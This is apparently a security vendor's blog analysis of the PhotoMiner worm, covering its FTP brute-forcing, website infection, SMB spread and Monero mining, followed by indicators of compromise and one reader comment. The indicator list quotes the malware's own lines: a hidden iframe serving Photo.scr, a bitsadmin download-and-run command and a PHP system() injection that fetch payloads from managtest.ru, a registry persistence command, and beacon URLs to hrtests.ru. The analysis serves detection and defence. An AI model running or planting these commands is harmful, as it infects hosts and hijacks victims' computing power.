Over the past few months, we’ve been following a new type of worm we named PhotoMiner. PhotoMiner features a unique infection mechanism, reaching endpoints by infecting websites hosted on FTP servers while making money by mining Monero. The choice of a lesser known currency with a good exchange rate allows the attackers to rapidly gain money while the sophisticated use of safeguards makes it resilient to most disruption attempts, potentially leaving victims infected for years.
We’ve documented thousands of attacks originating from hundreds of IPs, running similar attack flows while using different binaries. In this report we will share our research on the PhotoMiner’s timelines, infection strategies, C&C servers and provide tools to help detect the malware.

Attack Description

On January 10 2016, GuardiCore Global Sensor Network detected an automated attack uploading suspicious files to FTP hosts. Usually, uploading files to a vulnerable FTP server would go unnoticed in organizations but our Sensor Network identified an anomalous behaviour where identical incidents continued to pile up, arriving from all over the world.

Photominer victims are predominantly from Asian countries, but no area is immune

PhotoMiner victims are predominantly from Asian countries, but no area is immune

Since its first release, the malware has evolved rapidly. Till today, we’ve seen two different variants of PhotoMiner and over a dozen versions, indicating a rapid pace of evolution. The first variant was compiled on December 9, 2015 and included the core miner and basic propagation abilities. The second variant was released February 3, 2016 and quickly became the dominant version we can observe in the wild.

Spreading and Infecting

Over time, PhotoMiner added new capabilities including a unique multi-stage infection mechanism. First, insecure FTP servers over the world are compromised. Then, innocent websites hosted alongside the FTP servers are engineered to infect their visitors with malware. Finally, unsuspecting website visitors are infected with malware that does not only mine crypto-currency, but also seeks to infect additional FTP servers and systems in local networks.

PhotoMiner uses two types of attack techniques:

The primary attack method takes advantage of insecure FTP servers and clueless users. Since websites are frequently accessible over FTP, the operators of PhotoMiner are able to easily infect website source code and from there, innocent users. This method poses a long term danger to website security.

This is a simple two-stage attack;

  • By brute forcing random IP addresses and working off a user/password dictionary, weakly protected FTP servers are located and attacked.
  • Once a successful login attempt is made, a copy of the malware is uploaded to each writable server. At this point, each and every file capable of being rendered to a user (such as HTML, PHP and aspx files) is infected with the following string:
HTML injecting the malware

An infected website serving up the malware

At this stage, rendering the page will cause a vulnerable browser to serve as a download. A careless user will click Open and let the malware in. Recent variants of the malware have upgraded this attack by adding server-side code injection and attempting to install a Linux based miner.

The target server IP, its credentials and the list of infected files are sent to the malware’s backend servers. With this information, the attackers can later login to the infected FTP servers, infecting more files and pivot into additional victims.

The second method is based on attacking Windows endpoints and servers reachable in the local area network using the following steps:

  • PhotoMiner uses built-in Windows systems tools such as ‘arp’ and ‘net view’ to read the ARP cache and to scan the local network segment using the BROWSER protocol.
  • Next, it attempts to brute force a connection over SMB. With each successful connection, PhotoMiner attempts to drop copies of itself into every accessible remote startup location. After any successful copy, it will use WMI scripting to execute local copies.
PhotoMiner disables hibernation, sets itself to run on startup and many other steps

PhotoMiner disables hibernation

Some variants stealthily open a public Wi-Fi access point with the hardcoded name of “Free_WIFI_abc12345” which can lure innocent users into the network and get them infected.

Attackers lure website visitors by opening an accessible wifi access point

Attackers lure website visitors by opening an accessible wifi access point

Malware In Depth

PhotoMiner is built in a modular fashion, creating a standalone executable focused on mining Monero and a complex wrapper that is responsible for the persistence mechanism and further infections. This wrapper is comprised of two main variants with multiple sub versions:

  • The first variant img001.scr is unique in its use of NSIS, a custom scripting language.
    Built for installers, NSIS is a perfect fit for writing simple installers including malware. The code is  easy to read and debug, enabling the attackers to easily iterate and add features
  • The second variant photo.scr is a native binary that implements the img001.scr functionality in native code
NSIS Scripts are easy to write and very readable

Writing complex scripts that interact with the operating system is made simple using NSIS

Both variants include multiple sub versions where differences range from bug fixes to changes in the infection technique. Despite the multitude of versions, they follow the same order of operations. As such, we will describe them together, mentioning distinct abilities only when required.

During the initialization stage, PhotoMiner performs householding tasks such as persistence mechanism installation and collecting configuration data for the miner:  To install a persistence mechanism, the PhotoMiner registers as a startup program using the following:

  • HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
  • %ALLUSERSPROFILE%\Microsoft\Windows\Start Menu\Programs\Startup\
  • %HOMEPATH%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\

While basic, this technique does work and today does not automatically mark a program as “malicious”.

Configuration data is acquired by communicating over standard HTTP with a list of predefined hostnames, all serving a generic configuration file. Currently the given configuration is a list of Monero pools and wallets from which the malware randomly picks a recipient. This configuration file is scrambled using a basic reverse-dictionary. This means that for each scrambled character, a matching character is retrieved from a hardcoded dictionary, while non scrambled characters are safely skipped over.

Configuration files are can be unscrambled

Configuration file: Scrambled vs unscrambled

At this stage basic details about the computer such as operating system version and IP are sent to C&C servers. PhotoMiner connects with C&C servers to communicate its progress rather than accepting “commands” and infact does not include any remote access capabilities. Our attackers have built a resilient backend, spread over multiple domain names and using VPS servers rotated across different hosting providers. However, thanks to several mistakes made by the attackers such as reusing servers and IP addresses the different campaigns are tied together through shared servers.

After initialization, the malware “spins off” the miner as a separate process and goes on to spread itself. This minimises the danger posed by antivirus programs to the miner itself. The mining module itself is a packed version of BitMonero, the core implementation of the Monero worker and is a legit program which is not likely to attract unwanted attention.

Detecting and Preventing PhotoMiner Attacks

PhotoMiner may infect FTP servers regardless of the hosting software and use the full computing power of any victim Windows machine.

For endpoints, implementing recommended security policies will easily prevent attacks, such as application whitelisting and endpoint firewalls which prevent outbound connections. If not an option, up to date browsers will prevent drive-by downloads such as used here.

Deploy a security solution that provides in-depth visibility into the data-center such as Guardicore Reveal™ to immediately alert on these types of malware executed on a machine it protects.

FTP servers shouldn’t allow unauthorized connections by locking down allowed IP addresses and making sure strong user/password combinations are in use.

If an infected server is detected, verify its code files are sanitised and remove all copies of the malware from the server.

Conclusion

Infecting websites through unprotected FTP servers is a classic attack that seems to be gaining popularity once again. By creating an infection that is hard to disrupt, the writers of PhotoMiner have created a botnet that is undoubtedly here to stay.

A non-secure service facing the internet, such as an unprotected FTP server, is one of the most common ways attackers use to first penetrate an organization. Attackers currently using their botnet for mining may in the future use stolen credentials and infected machines to move laterally inside the data center and compromise the most valuable assets of the organization.

IoCs

File hashes

  • photo.scr_ver29
    • MD5       6b422988b8b66e54e68f110c64914744
    • SHA256 8a2a28d164a6d4011e83ae3f930de8bf1e01ba2e013bee43460f2f58bdaf4109
  • photo.scr_ver17
    • MD5       6b422988b8b66e54e68f110c64914744
    • SHA256 a7f9c14c314680c077ebc2ab0fcb19ecde98a39da4690a13be33799cb32052ad
  • photo.scr_ver22a
    • MD5       e14c3ac5c7ebafe906ac8b7ae0bd4b92
    • SHA256 8cf156211c55955c006e30eee85d06776b6a8c43dcd9010a88e5d4391e30837c
  • photo.scr_ver22b
    • MD5       beea8b5d0a35f73ecbfd0ca8fcf96694
    • SHA256 727865815de231bb0be0dcf1e41258dc8f9563a37bb3c32cac9eb0332ed7848f
  • photo.scr_ver22c
    • MD5       fe9787b3d1c40d4cec154511f7725da6
    • SHA256 cdf743f542226971129e8c037fa2ea29ee488566848887ff8de3dd166b0636b8
  • photo.scr_ver24a
    • MD5       e3b35ae837911135c70acb0ece15bf84
    • SHA256 5f522ebe3f4b2f1797249e431077725c45c76424dc21f7d16d5772ac35607f62
  • photo.scr_ver24B
    • MD5       aba2d86ed17f587eb6d57e6c75f64f05
    • SHA256 807126cbae47c03c99590d081b82d5761e0b9c57a92736fc8516cf41bc564a7d
  • information.vbe
    • MD5       e9ffdb716af3d355b25096a8ed4de8ef
    • SHA256 30daba44a4a25ff5750508613f897057a55337458f19b562e2ed1172c77e626b
  • IMG001.scr
    • MD5       fbbcf1e9501234d6661a0c9ae6dc01c9
    • SHA256 d9901b16a93aad709947524379d572a7a7bf8e2741e27a1112c95977d4a6ea8c

File names

  • images.scr
  • NsCpuCNMiner32.exe
  • NsCpuCNMiner64.exe
  • Information.vbe
  • IMG001.scr

Domains

  • stafftest.ru
  • hrtests.ru
  • profetest.ru
  • testpsy.ru
  • pstests.ru
  • qptest.ru
  • jobtests.ru
  • iqtesti.ru
  • managtest.ru
  • testworks.ru

Indicative strings

  • http://hrtests.ru/S.php?ver=22&pc=%s&user=%s&sys=%s&cmd=%s&startup=%s/%s
  • http://hrtests.ru/S.php?ver=24&pc=%s&user=%s&sys=%s&cmd=%s&startup=%s/%s
  • http://hrtests.ru/S.php?ver=29&pc=%d.%d.%d.%d&user=%s&sys=%s&cmd=%s&startup=ok
  • http://hrtests.ru/S.php?ver=17&pc=%c%c%c%c%c%c%c&user=%s&sys=%s&cmd=%s&startup=%s/%s
  • /c echo f|xcopy /y “%s” “%%APPDATA%%\Photo.exe” && reg add “HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run” /v “Run” /d “%%APPDATA%%\Photo.exe” /t REG_SZ /f
  • /c bitsadmin /transfer whatever “http://www.managtest.ru/WinRAR.exe” “%TEMP%\WinRAR.exe” && “%TEMP%\WinRAR.exe”
  • /c (echo stratum+tcp://mine.moneropool.com:3333& echo stratum+tcp://monero.crypto-pool.fr:3333& echo stratum+tcp://xmr.prohash.net:7777& echo stratum+tcp://pool.minexmr.com:5555)> %TEMP%\pools.txt
  • <?php system(“apt-get update && apt-get install screen libcurl4-openssl-dev libjansson-dev -y & test -e minerd || (wget http://managtest.ru/minerd && chmod 777 minerd && screen -dmS miner ./minerd -a cryptonight -o stratum+tcp://pool.minexmr.com:4444 -u 42n7TTpcpLe8yPPLxgh27xXSBWJnVu9bW8t7GuZXGWt74vryjew2D5EjSSvHBmxNhx8RezfYjv3J7W63bWS8fEgg6tct3yZ -p x)”);
  • <iframe src=Photo.scr width=1 height=1 frameborder=0>
  • Sr&w09.
2 comments
  1. João Ferreira
    João Ferreira says:

    We got a Windows server 2012 updated affected with this virus this week.
    In all the website folders there was a PHOTO.scr file but our symantec av removed everything, even the .php files!
    Glad we had backed up everything.

    I turned off the FTP and until now everything seems ok.
    I guess the safer ftp is not use ftp!

    Reply

Leave a Comment

Want to join the discussion?
Feel free to contribute!

Leave a Reply

Your email address will not be published. Required fields are marked *